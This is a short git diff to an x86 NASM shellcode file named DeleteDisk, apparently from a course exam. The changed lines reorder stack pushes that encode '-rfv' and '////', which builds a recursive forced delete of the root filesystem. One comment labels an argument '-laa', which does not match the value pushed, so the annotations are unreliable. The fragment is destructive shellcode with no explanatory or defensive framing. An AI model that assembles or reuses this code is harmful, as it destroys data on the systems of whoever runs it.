diff --git a/Exam/DeleteDisk/DeleteDisk.nasm b/Exam/DeleteDisk/DeleteDisk.nasm index c472dbb..3ef697c 100644 --- a/Exam/DeleteDisk/DeleteDisk.nasm +++ b/Exam/DeleteDisk/DeleteDisk.nasm @@ -15,10 +15,10 @@ _start: mov ebx, esp ;move pointer to command into ebx push eax ;push null eax register to the stack - push 0x7666722d ;push argument to the stack "-laa" + push 0x2f2f2f2f ;push argument to the stack "-laa" mov esi, esp ;move stack pointer to esi push esi - push 0x2f2f2f2f + push 0x7666722d mov esi, esp push eax ;push null eax register to the stack